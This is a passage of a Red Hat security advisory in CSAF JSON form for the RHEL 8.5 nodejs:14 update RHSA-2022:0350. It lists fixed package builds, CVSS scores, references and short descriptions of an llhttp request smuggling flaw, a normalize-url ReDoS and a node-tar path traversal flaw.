"AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "llhttp: HTTP Request Smuggling when parsing the body of chunked requests" }, { "cve": "CVE-2021-33502", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-05-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1964461" } ], "notes": [ { "category": "description", "text": "A flaw was found in normalize-url. Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-normalize-url: ReDoS for data URLs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-33502" }, { "category": "external", "summary": "RHBZ#1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-33502", "url": "https://www.cve.org/CVERecord?id=CVE-2021-33502" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539", "url": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539" } ], "release_date": "2021-05-21T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-normalize-url: ReDoS for data URLs" }, { "cve": "CVE-2021-37701", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-31T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1999731" } ], "notes": [ { "category": "description", "text": "A flaw was found in the npm package \"tar\" (aka node-tar). Extracting tar files that contain both a directory and a symlink with the same name, where the symlink and directory names in the archive entry used backslashes as a path separator, made it possible to bypass node-tar symlink checks on directories. This flaw allows an untrusted tar file to extract and overwrite files into an arbitrary location. A similar confusion can arise on case-insensitive filesystems. The highest threat from this vulnerability is to integrity and system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient symlink protection due to directory cache poisoning using symbolic links allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux version 8 and Red Hat Software Collection both embed `node-tar` in the npm command. However, npm explicitly prevents the extraction of symlink via a filter. npm might still be affected via node-gyp, if the attacker is able to control the target URL.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37701" }, { 